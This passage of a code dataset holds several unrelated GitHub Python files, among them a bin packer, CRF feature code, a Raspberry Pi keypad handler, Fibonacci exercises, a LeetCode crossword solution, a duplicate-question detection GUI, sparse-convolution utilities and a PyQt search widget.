res\r\n \r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n blocks = [\r\n { \"width\": 100, \"height\": 100, \"data\": {\"color\":0xff0000} },\r\n { \"width\": 100, \"height\": 100, \"data\": {\"color\":0x0000ff} },\r\n { \"width\": 80, \"height\": 80 },\r\n { \"width\": 80, \"height\": 80, \"data\": {\"color\":0x0} },\r\n ]\r\n packer = BinPacker(300,300)\r\n res = packer.fit(blocks, [\"area\"])\r\n\r\n for i in range(len(res)):\r\n node = res[i]\r\n if node.data == \"empty\":\r\n continue\r\n color = node.data[\"color\"]\r\n print(node.x, node.y, node.width, node.height, color)\r\n\r\n","repo_name":"0r4nd/HandwritingRecognition","sub_path":"src/BinPacker.py","file_name":"BinPacker.py","file_ext":"py","file_size_in_byte":3622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"341342017","text":"from collections import namedtuple\n\nimport numpy as np\n\nFeature = namedtuple(\"Feature\", 'var assignment param_idx')\n\n\ndef compute_conditioned_singleton_features(mat, model_params, param_idx_base=0):\n height, width = mat.shape\n n_hidden_states = model_params['num_hidden_states']\n n_observed_states = model_params['num_observed_states']\n\n features = []\n for hidden_state in range(n_hidden_states):\n for feature_num in range(width):\n for v in range(height):\n param_idx = np.ravel_multi_index([mat[v, feature_num], feature_num, hidden_state],\n dims=[n_observed_states, width, n_hidden_states],\n order='F')\n features.append(Feature(var=(v, ), assignment=(hidden_state, ), param_idx=param_idx_base+param_idx))\n\n return features\n\n\ndef compute_unconditioned_singleton_features(length, model_params, param_idx_base=0):\n features = []\n for state in range(model_params['num_hidden_states']):\n for v in range(length):\n features.append(Feature(var=(v, ), assignment=(state, ), param_idx=param_idx_base+state))\n return features\n\n\ndef compute_unconditioned_pair_features(length, model_params, param_idx_base=0):\n features = []\n if length < 2:\n return features\n K = model_params['num_hidden_states']\n for state1 in range(K):\n for state2 in range(K):\n param_idx = param_idx_base + np.ravel_multi_index([state2, state1], [K, K], order='F')\n for v in range(length-1):\n features.append(Feature(var=(v, v+1), assignment=(state1, state2), param_idx=param_idx))\n return features\n\n\ndef generate_all_features(mat, model_params):\n param_idx_base = 0\n\n all_features = []\n\n features = compute_conditioned_singleton_features(mat, model_params, param_idx_base)\n if features:\n all_features.extend(features)\n # we can not look into max(f.param_idx for f in features) as some combination might not have been observed\n # so I'm computing this using below formula.\n # In case there are more than one conditioned features, one will have to adjust it accordingly.\n # Code by Daphne Koller handles it differently, but I didn't understand it, so I used below formula.\n param_idx_base = mat.shape[1] * model_params['num_hidden_states'] * model_params['num_observed_states']\n\n for fn in [compute_unconditioned_singleton_features, compute_unconditioned_pair_features]:\n features = fn(mat.shape[0], model_params, param_idx_base)\n if features:\n param_idx_base = max(f.param_idx for f in features) + 1\n all_features.extend(features)\n\n return {'num_params': param_idx_base, 'features': all_features}\n\n\n\n\n","repo_name":"DhruvPatel01/coursera_pgm_python","sub_path":"CRF-Learning-For-OCR/generate_all_features.py","file_name":"generate_all_features.py","file_ext":"py","file_size_in_byte":2810,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"91"}
+{"seq_id":"7806732239","text":"import time\n\nimport adafruit_matrixkeypad\nimport board\nimport digitalio\n\nfrom observer_design_pattern.subject import Subject\nimport logging\n\nLOGGER = logging.getLogger(__name__)\n\nclass KeypadSubject(Subject):\n def __init__(self):\n super(KeypadSubject, self).__init__()\n rows = [digitalio.DigitalInOut(x) for x in (board.D26, board.D19, board.D13, board.D6)]\n cols = [digitalio.DigitalInOut(x) for x in (board.D5, board.D20, board.D11, board.D9)]\n keys = ((1, 2, 3, \"A\"),\n (4, 5, 6, \"B\"),\n (7, 8, 9, \"C\"),\n (\"*\", 0, \"#\", \"D\"))\n\n self.keypad = adafruit_matrixkeypad.Matrix_Keypad(rows, cols, keys)\n\n def get_latest_entered_keys_string(self):\n return self.get_state()\n\n @staticmethod\n def create_string_from_keys_array(entered_keys_array):\n entered_keys_string = ''\n for key in entered_keys_array:\n entered_keys_string += str(key)\n return entered_keys_string\n\n def _get_pressed_keys(self):\n def _is_accept_key(pressed_key):\n return pressed_key == 'A'\n\n def _keys_not_yet_pressed(pressed_keys):\n return len(pressed_keys) == 0\n\n entered_keys_array = []\n LOGGER.info('Listening for keypad presses...')\n while True:\n if not _keys_not_yet_pressed(self.keypad.pressed_keys):\n pressed_key = self.keypad.pressed_keys[0]\n if _is_accept_key(pressed_key):\n self.set_state(self.create_string_from_keys_array(entered_keys_array))\n entered_keys_array = []\n else:\n entered_keys_array.append(pressed_key)\n time.sleep(0.2)\n","repo_name":"PiAndArduinoGuy/hardware_security_controller","sub_path":"app/src/subject/keypad_subject.py","file_name":"keypad_subject.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"7482283270","text":"#################solution###############\n######faster fibonacci##################\ndef fibonacci(n):\n\tcurrent = 0\n\tafter = 1 \n\tfor i in range(0,n):\n\t\tcurrent , after = after, current + after\n\treturn current\n\n#############quiz########################\ndef fibonacci(n):\n i = 2\n result = [0,0]\n result[0] = 0\n result[1] = 1\n while i <= n:\n result.append(result[i-1]+result[i-2])\n i = i + 1\n return result[n]\n\n##########mathematically####################\ndef fibonacci(n):\n if n ==0:\n return 0\n if n == 1:\n return 1\n if n > 1:\n return fibonacci(n-1) + fibonacci(n-2)\n","repo_name":"silverashashash/Udacity101","sub_path":"Unit6/fibo.py","file_name":"fibo.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"762345766","text":"print(\"Hello world!\")\n\narr = []\nlim = 0\n\nwhile(True) :\n print(\"수 몇개를 정렬하시겠습니까?\\n>>\",end='')\n lim = input()\n if lim.isdigit() :\n lim = int(lim)\n break\n else :\n print(\"입력이 잘못됐습니다.\\n다시 입력해주세요.\")\n continue\n\n\ni = 0\nwhile i < lim :\n while(True) :\n print(\"입력할 수\\n>>\",end='')\n e = input()\n if e.isdigit() :\n e = int(e)\n arr.append(e)\n #print(arr[i])\n break\n else :\n print(\"입력이 잘못됐습니다.\\n다시 입력해주세요.\")\n continue\n i += 1\n #print(\"arr = {}\".format(arr))\narr.sort()\n#print(\"at input end : arr = {}\".format(arr))\nprint(\"\\n\\n입력하신 수는 \",end='')\ni = 0\nwhile i < lim :\n print(\"{}\".format(arr[i]),end=\"\")\n if not i == (lim - 1) :\n print(' , ',end=\"\")\n i += 1\nprint(\"이 있으며\")\nprint(\"가장 큰 수는 {}입니다.\".format(arr[lim - 1]))\n\n","repo_name":"ghdwpaks/python","sub_path":"it/day08/homework/ex01.py","file_name":"ex01.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"9643542088","text":"import random\nimport time\n\n\ndef download(filename):\n print(f'开始下载{filename}.')\n time.sleep(random.randint(2, 6))\n print(f'{filename}下载完成.')\n\n\ndef upload(filename):\n print(f'开始上传{filename}.')\n time.sleep(random.randint(4, 8))\n print(f'{filename}上传完成.')\n\n\n# download('MySQL从删库到跑路.avi')\n# upload('Python从入门到住院.pdf')\n\nstart = time.time()\ndownload('MySQL从删库到跑路.avi')\nend = time.time()\nprint(f'花费时间: {end - start:.3f}秒')\nstart = time.time()\nupload('Python从入门到住院.pdf')\nend = time.time()\nprint(f'花费时间: {end - start:.3f}秒')\n","repo_name":"mazy699/PythonDemo","sub_path":"Python-Core-50-Courses/c16/c16-01.py","file_name":"c16-01.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"7442374345","text":"import os.path\n\nimport cherrypy\n\nimport config\nfrom webapp import WebApp\n\nif __name__ == '__main__':\n cherrypy.config.update({\n 'server.socket_host': '0.0.0.0',\n })\n web_app = WebApp(config)\n conf = {\n '/': {\n 'tools.staticdir.root': os.path.abspath(os.getcwd())\n }\n }\n cherrypy.quickstart(web_app, '/', conf)\n","repo_name":"giraudan/dockerize-this","sub_path":"webapp/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"38383284352","text":"# 链接:https://leetcode.com/problems/check-if-word-can-be-placed-in-crossword/\n# 题意:给定一个 m * n 的矩阵 board ,表明一个填字游戏的当前状态,\n# board 仅由英文小写字母, ' ' 和 '#' 组成,\n# ' ' 表示可以填入字母,'#' 表示不能填入字母。\n# 现在判断给定的单词 word 是否能在满足以下条件下被填入矩阵中?\n# 条件:\n# 1. '#' 不能被填入;\n# 2. ' ' 可以填入��个字母;\n# 3. 如果 word 可以被横向填入,既可以从左往右填入,也可以从右往左填入,\n# 但要保证 word 左右两侧都是没有 ' ' 和字母;\n# 4. 如果 word 可以被纵向填入,既可以从上往下填入,也可以从下往上填入,\n# 但要保证 word 上下两侧都是没有 ' ' 和字母;\n\n# 数据限制:\n# m == board.length\n# n == board[i].length\n# 1 <= m * n <= 2 * 10 ^ 5\n# board[i][j] 是 ' ', '#', 或者一个英文小写字母\n# 1 <= word.length <= max(m, n)\n# word 只含有英文小写字母\n\n# 输入: board = [[\"#\", \" \", \"#\"], [\" \", \" \", \"#\"], [\"#\", \"c\", \" \"]], word = \"abc\"\n# 输出: true\n# 解释:\n# word 可以被纵向从上往下填入第二列\n\n# 输入: board = [[\" \", \"#\", \"a\"], [\" \", \"#\", \"c\"], [\" \", \"#\", \"a\"]], word = \"ac\"\n# 输出: false\n# 解释:\n# 无论如何填入,最后 word 的两侧都会有 ' ' 或者字母\n\n# 输入: board = [[\"#\", \" \", \"#\"], [\" \", \" \", \"#\"], [\"#\", \" \", \"c\"]], word = \"ca\"\n# 输出: true\n# 解释:\n# \"ca\" 可以被横向从右往左填入右下角\n\n\n# 思路: 枚举\n#\n# 数据量看起来很唬人,但只要直接暴力即可,\n# 我们枚举所有点,如果是 '#' ,则它的四个方向是可能被填入的,\n# 枚举判断每个方向是否能按题意填入即可,\n# \n# 开始寻找边界点的时间复杂度: O(m * n)\n# 然后判断是否能填入时,每个 字母 和 ' ' 最多只会被访问四次,\n# 所以时间复杂度仍是 O(m * n)\n#\n# 时间复杂度: O(m * n)\n# 空间复杂度: O(1)\n\n\nDIR = ((0, 1), (0, -1), (1, 0), (-1, 0))\n\n\nclass Solution:\n def placeWordInCrossword(self, board: List[List[str]], word: str) -> bool:\n # 获取矩阵大小\n m, n = len(board), len(board[0])\n first_ch = word[0]\n\n # 判断一个位置是否在矩阵中\n def is_ok(r: int, c: int) -> bool:\n return 0 <= r < m and 0 <= c < n\n\n # 判断从边界点 (r, c) 开始,按照 (dr, dc) 方向是否能填入 word\n def can_place(r: int, c: int, dr: int, dc: int) -> bool:\n # 如果前一个位置不是边界点,则直接返回 False\n if is_ok(r - dr, c - dc) and board[r - dr][c - dc] != '#':\n return False\n # 开始填入单词\n for ch in word:\n # 如果这个位置在矩阵外 或 这个位置既不是 ' ' 也不是 ch ,\n # 则此时不能填入,直接返回 False\n if not is_ok(r, c) or (board[r][c] != ' ' and board[r][c] != ch):\n return False\n # 走到下一个位置\n r, c = r + dr, c + dc\n # 已经填入全部 word ,判断当前位置是否处于边界点\n return not is_ok(r, c) or board[r][c] == '#'\n\n # 枚举边界点\n for r, row in enumerate(board):\n for c, ch in enumerate(row):\n # 如果不是 ' ' ,则不是边界点,直接跳过\n if ch == ' ' or ch == first_ch:\n # 此时可能能合法填入,判断是四个方向是否能够填入\n for dr, dc in DIR:\n # 如果能够填入 word ,则直接返回 True\n if can_place(r, c, dr, dc):\n return True\n # 所有情况都不能填入,返回 False\n return False\n","repo_name":"idealism-xxm/LeetCode","sub_path":"Python3/src/2001 ~ 2100/2018 - Check if Word Can Be Placed In Crossword.py","file_name":"2018 - Check if Word Can Be Placed In Crossword.py","file_ext":"py","file_size_in_byte":3993,"program_lang":"python","lang":"zh","doc_type":"code","stars":3,"dataset":"github-code","pt":"91"}
+{"seq_id":"2538117064","text":"\r\nfrom tkinter import *\r\nfrom tkinter import ttk\r\n\r\nfrom tensorflow.python.keras.models import load_model\r\nimport tensorflow.python.keras.backend as K\r\nfrom tensorflow.python.keras.preprocessing.sequence import pad_sequences\r\nimport json\r\nimport re\r\nimport numpy as np\r\nimport pandas as pd\r\nimport csv\r\n\r\n\r\n# gets a whole question inside text variable on which preprocessing is done and then the question is splitted into word indices and returned\r\ndef text_to_word_list(text):\r\n text = str(text)\r\n text = text.lower()\r\n\r\n # Clean the text\r\n text = re.sub(r\"[^A-Za-z0-9^,!.\\/'+-=]\", \" \", text)\r\n text = re.sub(r\"what's\", \"what is \", text)\r\n text = re.sub(r\"\\'s\", \" \", text)\r\n text = re.sub(r\"\\'ve\", \" have \", text)\r\n text = re.sub(r\"can't\", \"cannot \", text)\r\n text = re.sub(r\"n't\", \" not \", text)\r\n text = re.sub(r\"i'm\", \"i am \", text)\r\n text = re.sub(r\"\\'re\", \" are \", text)\r\n text = re.sub(r\"\\'d\", \" would \", text)\r\n text = re.sub(r\"\\'ll\", \" will \", text)\r\n text = re.sub(r\",\", \" \", text)\r\n text = re.sub(r\"\\.\", \" \", text)\r\n text = re.sub(r\"!\", \" ! \", text)\r\n text = re.sub(r\"\\/\", \" \", text)\r\n text = re.sub(r\"\\^\", \" ^ \", text)\r\n text = re.sub(r\"\\+\", \" + \", text)\r\n text = re.sub(r\"\\-\", \" - \", text)\r\n text = re.sub(r\"\\=\", \" = \", text)\r\n text = re.sub(r\"'\", \" \", text)\r\n text = re.sub(r\"(\\d+)(k)\", r\"\\g<1>000\", text)\r\n text = re.sub(r\":\", \" : \", text)\r\n text = re.sub(r\" e g \", \" eg \", text)\r\n text = re.sub(r\" b g \", \" bg \", text)\r\n text = re.sub(r\" u s \", \" american \", text)\r\n text = re.sub(r\"\\0s\", \"0\", text)\r\n text = re.sub(r\" 9 11 \", \"911\", text)\r\n text = re.sub(r\"e - mail\", \"email\", text)\r\n text = re.sub(r\"j k\", \"jk\", text)\r\n text = re.sub(r\"\\s{2,}\", \" \", text)\r\n\r\n text = text.split()\r\n\r\n return text\r\n\r\n\r\n# write test questions to .csv file\r\ndef write_to_csv(question1, question2, is_duplicate, percent):\r\n with open('prediction_test_questions.csv', mode='a') as question_file:\r\n question_writer = csv.writer(\r\n question_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_ALL)\r\n question_writer.writerow([question1, question2, is_duplicate, percent])\r\n\r\n\r\n# manhattan distance calculation function\r\ndef manhattan_distance(left, right):\r\n return K.exp(-K.sum(K.abs(left-right), axis=1, keepdims=True))\r\n\r\n\r\n# load trained model\r\nmodel_path = 'model_for_gui.h5'\r\nnew_model = load_model(model_path)\r\n\r\n\r\n# import vocabulary dictionary and parse it in python\r\ndict_path = 'vocabulary_dictionary.json'\r\n\r\n\r\n# read dictionary file\r\nwith open(dict_path, 'r') as my_file:\r\n data = my_file.read()\r\n\r\n# parse dictionary\r\nvocab_dictionary = json.loads(data)\r\n\r\n\r\n# function for tkinter button-click event\r\ndef get_que(event):\r\n\r\n print('\\n\\n\\n')\r\n question1 = First_que.get()\r\n question2 = Second_que.get()\r\n print(question1)\r\n print(question2)\r\n\r\n # Get the value stored in the entries\r\n q1 = word_indexer(First_que.get())\r\n q2 = word_indexer(Second_que.get())\r\n\r\n # Delete the value in the entry\r\n First_que.delete(0, \"end\")\r\n Second_que.delete(0, \"end\")\r\n\r\n # get result and percentage from prediction\r\n is_duplicate, percent = result_prediction(q1, q2)\r\n\r\n # write final result to csv file\r\n write_to_csv(question1, question2, is_duplicate, percent)\r\n\r\n\r\n# function to predict result from two supplied questions\r\n# that returns is_duplicate result and percentage\r\ndef result_prediction(q1, q2):\r\n\r\n # preprocessing for prediction\r\n question_list = [q1, q2]\r\n question_list = pad_sequences(question_list, maxlen=50)\r\n\r\n # convert to numpy array to feed to model\r\n que1 = np.asarray(question_list[0])\r\n que2 = np.asarray(question_list[1])\r\n\r\n # predict sample questions on saved model using above numpy array\r\n pred = new_model.predict([[que1], [que2]])\r\n\r\n # Prediction threshold\r\n if pred >= 0.5:\r\n print(\"Duplicate -> \", str(pred[0][0]*100) + ' %')\r\n return 1, str(pred[0][0]*100)\r\n else:\r\n print(\"Not Duplicate -> \", str(pred[0][0]*100) + ' %')\r\n return 0, str(pred[0][0]*100)\r\n\r\n\r\n# function to index tokenized words using training vocabulary dictionary\r\ndef word_indexer(question):\r\n ques_index = []\r\n\r\n for word in text_to_word_list(question):\r\n if word in vocab_dictionary:\r\n ques_index.append(vocab_dictionary[word])\r\n return ques_index\r\n\r\n\r\n# ------------------------GUI STARTS HERE------------------------\r\nroot = Tk()\r\nroot.title(\"Duplicate Question Detection\")\r\nroot.minsize(width=800, height=150)\r\nroot.maxsize(width=800, height=150)\r\n\r\n# rows start at 0, 1, ...\r\n# columns start at 0, 1, ...\r\n# sticky defines how the widget expands (N, NE, E, SE,\r\n# S, SW, W, NW)\r\n# padx and pady provide padding around the widget above\r\n# and below it\r\n\r\n# First label\r\nLabel(root, text=\"First Question\").grid(row=0, sticky=W, padx=10)\r\nFirst_que = Entry(root, width=100)\r\nFirst_que.grid(row=0, column=1, sticky=E, pady=10)\r\n\r\n# Second label\r\nLabel(root, text=\"Second Question\").grid(row=1, sticky=W, padx=10)\r\nSecond_que = Entry(root, width=100)\r\nSecond_que.grid(row=1, column=1, sticky=E, pady=10)\r\n\r\n# Button label\r\nequalButton = Button(root, text=\"Submit\")\r\nequalButton.grid(row=3)\r\n\r\n# Button click event-> function 'get_que' is called\r\nequalButton.bind(\"\", get_que)\r\n\r\n# GUI END\r\nroot.mainloop()\r\n","repo_name":"MohitDhungana/duplicate_question_detection","sub_path":"DQD_with_GUI_and_Prediction.py","file_name":"DQD_with_GUI_and_Prediction.py","file_ext":"py","file_size_in_byte":5391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"31854272378","text":"import torch\nimport torch.nn as nn\nfrom torchsparse import SparseTensor\nimport spconv.pytorch as spconv\nfrom torch.utils.checkpoint import checkpoint\nimport torchsparse.nn as spnn\n\n\n\ndef spconv2ts(sct: spconv.SparseConvTensor):\n \"\"\"\n sct: SparseConvTensor (spconv)\n \n returns: \n - st: SparseTensor (torchsparse)\n - sct_save: a dict including some info from sct,\n for the use of inverse transformation.\n \"\"\"\n feats = sct.features\n coords = torch.index_select(sct.indices, 1, \n torch.LongTensor([3,2,1,0]).to(sct.indices.device)).contiguous()\n st = SparseTensor(feats, coords, 1)\n\n sct_save = dict()\n sct_save['batch_size'] = sct.batch_size\n sct_save['benchmark'] = sct.benchmark\n sct_save['benchmark_record'] = sct.benchmark_record\n sct_save['grid'] = sct.grid\n sct_save['indice_dict'] = sct.indice_dict\n sct_save['spatial_shape'] = sct.spatial_shape\n sct_save['voxel_num'] = sct.voxel_num\n\n return st, sct_save\n \n\ndef ts2spconv(st: SparseTensor, sct_save: dict):\n \"\"\"\n - st: SparseTensor (torchsparse)\n - sct_save: a dict including some additional info for sct\n \n returns: \n sct: SparseConvTensor (spconv)\n \"\"\"\n features = st.feats\n indices = torch.index_select(st.coords, 1, \n torch.LongTensor([3,2,1,0]).to(st.coords.device)).contiguous()\n sct = spconv.SparseConvTensor(\n features,\n indices,\n spatial_shape=sct_save['spatial_shape'],\n batch_size=sct_save['batch_size'],\n grid=sct_save['grid'],\n voxel_num=sct_save['voxel_num'],\n indice_dict=sct_save['indice_dict'],\n benchmark=sct_save['benchmark']\n )\n sct.benchmark_record = sct_save['benchmark_record']\n\n return sct\n\n\nimport torchsparse.nn.functional as F\nfrom torchsparse.nn.utils import get_kernel_offsets\n\n\n# x: SparseTensor->large, stride: scale of kernel \n# return : SparseTensor->small\ndef large_to_small(large_x, stride):\n x_C = torch.cat([torch.div(large_x.C[:,:3], stride, rounding_mode='floor').int(), large_x.C[:,3:]], dim=1)\n large_x_hash = F.sphash(x_C.to(large_x.F.device))\n small_x_C = torch.unique(x_C, dim=0)\n small_x_hash = F.sphash(small_x_C.to(large_x.F.device))\n\n idx_query = F.sphashquery(large_x_hash, small_x_hash)\n counts = F.spcount(idx_query.int(), len(small_x_hash))\n inserted_feat = F.spvoxelize(large_x.F, idx_query, counts)\n small_x = SparseTensor(inserted_feat, small_x_C, stride)\n\n small_x.cmaps = large_x.cmaps\n small_x.kmaps = large_x.kmaps\n return small_x, idx_query, counts\n\n\ndef small_to_large_v2(small_x, large_x, idx, counts):\n # local offsets to index neighbors\n ## [2^3,3]\n kernel_size = 3\n offsets = get_kernel_offsets(kernel_size, 1, 1, device=large_x.F.device)\n neighbor_hash = F.sphash(\n small_x.C, offsets\n )\n\n small_hash = F.sphash(small_x.C.to(large_x.F.device))\n\n idx_query = F.sphashquery(neighbor_hash, small_hash)\n idx_query = idx_query.transpose(0,1).contiguous()\n idx_query_flat = idx_query.view(-1)\n f = torch.cat([small_x.F, torch.ones_like(small_x.F[:,:1]).to(small_x.F.device)], dim=1)\n f = f*counts.unsqueeze(dim=-1)\n weights = torch.ones(small_x.F.shape[0], kernel_size**3).to(small_x.F.device).float()\n weights[idx_query == -1] = 0\n new_feat = F.spdevoxelize(f, idx_query, weights, kernel_size)\n new_feat = new_feat[:,:-1] / new_feat[:,-1:]\n\n large_x.F = new_feat[idx]\n\n return large_x\n\n\nclass TSELKBlock(nn.Module):\n def __init__(self, inc, outc, baseop='cos'):\n super().__init__()\n self.inc = inc\n self.outc = outc\n self.baseop = baseop\n self.pre_mix = nn.Sequential(\n nn.Linear(self.inc, self.inc, bias = False),\n nn.LayerNorm(self.inc, eps=1e-6)\n )\n self.local_mix = nn.Sequential(\n spnn.Conv3d(self.inc, self.inc, kernel_size=3, dilation=1,\n stride=1),\n )\n\n self.pos_weight = nn.Sequential(\n nn.Linear(3, self.inc, bias=False),\n )\n \n self.norm = nn.LayerNorm(self.inc, eps=1e-6)\n self.norm_local = nn.LayerNorm(self.inc, eps=1e-6)\n self.activate = nn.ReLU(True)\n\n\n def forward(self, sct: spconv.SparseConvTensor, stride):\n \"\"\"\n sct: SparseConvTensor (in spconv)\n \"\"\"\n st, sct_save = spconv2ts(sct)\n new_st = self.forward_(st, stride)\n new_sct = ts2spconv(new_st, sct_save)\n return new_sct\n\n\n def forward_(self, st: SparseTensor, stride):\n '''\n st: SparseTensor\n stride: scale of large kernel\n '''\n F_input = self.pre_mix(st.F)\n local_mix = self.local_mix(st)\n \n if self.baseop == 'sin':\n pos_weight = self.pos_weight(st.C[:,:3].float())\n pos_weight_sin = torch.sin(pos_weight)\n pos_weight_cos = torch.cos(pos_weight)\n F_weighted_sin = F_input*pos_weight_sin\n F_weighted_cos = F_input*pos_weight_cos\n st.F = torch.cat([F_weighted_sin, F_weighted_cos], dim=1).contiguous()\n\n small_st, idx, counts = large_to_small(st, stride=stride)\n large_st = small_to_large_v2(small_st, st, idx, counts)\n\n\n new_st_F = large_st.F[:,:self.inc]*pos_weight_cos - large_st.F[:,self.inc:]*pos_weight_sin\n\n elif self.baseop == 'cos':\n pos_weight = self.pos_weight(st.C[:,:3].float())\n pos_weight = pos_weight[:,:self.inc//2].repeat([1,2]) # channel grouping\n pos_weight_sin = torch.sin(pos_weight)\n pos_weight_cos = torch.cos(pos_weight)\n F_weighted_sin = F_input*pos_weight_sin\n F_weighted_cos = F_input*pos_weight_cos\n st.F = torch.cat([F_weighted_cos, F_weighted_sin], dim=1).contiguous()\n\n small_st, idx, counts = large_to_small(st, stride=stride)\n large_st = small_to_large_v2(small_st, st, idx, counts)\n\n new_st_F = large_st.F[:,:self.inc]*pos_weight_cos + large_st.F[:,self.inc:]*pos_weight_sin\n\n elif self.baseop == 'cos_x_alpha':\n pos_weight = self.pos_weight(st.C[:,:3].float())*self.alpha\n pos_weight = pos_weight[:,:self.inc//2].repeat([1,2]) # channel grouping\n\n pos_weight_sin = torch.sin(pos_weight)\n pos_weight_cos = torch.cos(pos_weight)\n F_weighted_sin = F_input*pos_weight_sin\n F_weighted_cos = F_input*pos_weight_cos\n F_weighted_linear = F_input*pos_weight\n st.F = torch.cat([F_weighted_cos, F_weighted_sin, F_weighted_linear], dim=1).contiguous()\n\n small_st, idx, counts = large_to_small(st, stride=stride)\n large_st = small_to_large_v2(small_st, st, idx, counts)\n\n new_st_F = large_st.F[:,:self.inc]*pos_weight_cos + large_st.F[:,self.inc:2*self.inc]*pos_weight_sin + (large_st.F[:,2*self.inc:]-F_weighted_linear)\n\n elif self.baseop == 'cos_sin':\n pos_weight = self.pos_weight(st.C[:,:3].float())\n\n pos_weight_sin = torch.sin(pos_weight)\n pos_weight_cos = torch.cos(pos_weight)\n F_weighted_sin = F_input*pos_weight_sin\n F_weighted_cos = F_input*pos_weight_cos\n st.F = torch.cat([F_weighted_cos, F_weighted_sin], dim=1).contiguous()\n\n small_st, idx, counts = large_to_small(st, stride=stride)\n large_st = small_to_large_v2(small_st, st, idx, counts)\n\n new_st_F = (large_st.F[:,:self.inc]*pos_weight_cos + large_st.F[:,self.inc:]*pos_weight_sin) + \\\n (large_st.F[:,self.inc:]*pos_weight_cos - large_st.F[:,:self.inc]*pos_weight_sin)\n\n elif self.baseop == 'x':\n pos_weight = self.pos_weight(st.C[:,:3].float())\n pos_weight = pos_weight[:,:self.inc//2].repeat([1,2])\n \n F_weighted_linear = F_input*pos_weight\n st.F = torch.cat([F_weighted_linear], dim=1).contiguous()\n\n small_st, idx, counts = large_to_small(st, stride=stride)\n large_st = small_to_large_v2(small_st, st, idx, counts)\n\n\n new_st_F = large_st.F-F_weighted_linear\n\n new_st_F = self.norm(new_st_F)\n local_F = self.norm_local(local_mix.F)\n new_st_F = self.activate(new_st_F+local_F)\n\n large_st.F = new_st_F\n\n return large_st\n\n\n# no additional bn in v2\n# CAUTION: DEPRECATED! Used in v2!\nclass TSELKBlock_no_tail_norm(nn.Module):\n def __init__(self, inc, outc, baseop='cos'):\n super().__init__()\n self.inc = inc\n self.outc = outc\n self.baseop = baseop\n self.pre_mix = nn.Sequential(\n nn.Linear(self.inc, self.inc, bias = False),\n nn.LayerNorm(self.inc, eps=1e-6)\n )\n self.pos_weight = nn.Sequential(\n nn.Linear(3, self.inc, bias=False),\n )\n self.norm = nn.BatchNorm1d(self.inc) \n\n\n def forward(self, sct: spconv.SparseConvTensor, stride):\n \"\"\"\n sct: SparseConvTensor (in spconv)\n \"\"\"\n st, sct_save = spconv2ts(sct)\n new_st = self.forward_(st, stride)\n new_sct = ts2spconv(new_st, sct_save)\n return new_sct\n\n\n def forward_(self, st: SparseTensor, stride):\n '''\n st: SparseTensor\n stride: scale of large kernel\n '''\n # 1. pos weight\n # F_input = st.F # self.pre_mix(st.F)\n F_input = self.pre_mix(st.F)\n if self.baseop == 'exp':\n pos_weight = torch.exp(self.pos_weight(st.C[:,:3].float()) / 100.0)\n F_weighted = F_input*pos_weight\n st.F = F_weighted\n\n small_st, idx = large_to_small(st, stride=stride)\n large_st = small_to_large(small_st, st, idx)\n\n new_st_F = large_st.F / pos_weight\n elif self.baseop == 'sin':\n pos_weight = self.pos_weight(st.C[:,:3].float())\n pos_weight_sin = torch.sin(pos_weight)\n pos_weight_cos = torch.cos(pos_weight)\n F_weighted_sin = F_input*pos_weight_sin\n F_weighted_cos = F_input*pos_weight_cos\n st.F = torch.cat([F_weighted_sin, F_weighted_cos], dim=1).contiguous()\n\n small_st, idx, counts = large_to_small(st, stride=stride)\n large_st = small_to_large_v2(small_st, st, idx, counts)\n\n\n new_st_F = large_st.F[:,:self.inc]*pos_weight_cos - large_st.F[:,self.inc:]*pos_weight_sin\n\n elif self.baseop == 'cos':\n pos_weight = self.pos_weight(st.C[:,:3].float())\n pos_weight_sin = torch.sin(pos_weight)\n pos_weight_cos = torch.cos(pos_weight)\n F_weighted_sin = F_input*pos_weight_sin\n F_weighted_cos = F_input*pos_weight_cos\n st.F = torch.cat([F_weighted_cos, F_weighted_sin], dim=1).contiguous()\n\n small_st, idx, counts = large_to_small(st, stride=stride)\n large_st = small_to_large_v2(small_st, st, idx, counts)\n\n new_st_F = large_st.F[:,:self.inc]*pos_weight_cos + large_st.F[:,self.inc:]*pos_weight_sin\n\n # new_st_F = self.norm(new_st_F)\n\n large_st.F = new_st_F\n\n return large_st\n\n","repo_name":"MCG-NJU/LinK","sub_path":"detection/det3d/models/utils/ts_elk.py","file_name":"ts_elk.py","file_ext":"py","file_size_in_byte":11308,"program_lang":"python","lang":"en","doc_type":"code","stars":68,"dataset":"github-code","pt":"91"}
+{"seq_id":"34211882366","text":"# coding: UTF-8\r\nfrom PyQt5.QtWidgets import *\r\nfrom PyQt5.QtGui import QFont, QIcon\r\nfrom SongsInfomation.SearchInfo import SearchInfo\r\nfrom WorkThread import WorkThread\r\nfrom PyQt5.Qt import *\r\nimport sys\r\n\r\n\r\nclass SearchWidget(QWidget):\r\n sig_search_info = pyqtSignal(str)\r\n sig_search_smart_box = pyqtSignal(str)\r\n\r\n def __init__(self, parent=None):\r\n super(SearchWidget, self).__init__(parent)\r\n\r\n # Init member\r\n self.search_lineEdit = QLineEdit()\r\n self.btn_search = QPushButton(\"搜索\")\r\n self.completer = QCompleter() # 用于实现lineEdit自动补全\r\n self.completer.setCaseSensitivity(Qt.CaseInsensitive)\r\n self.completer.setCompletionMode(QCompleter.UnfilteredPopupCompletion)\r\n self.list_model = QStringListModel()\r\n self.completer.setModel(self.list_model)\r\n\r\n # Init thread\r\n self.net_thread = QThread()\r\n self.word_thread = WorkThread()\r\n\r\n self.init_ui()\r\n 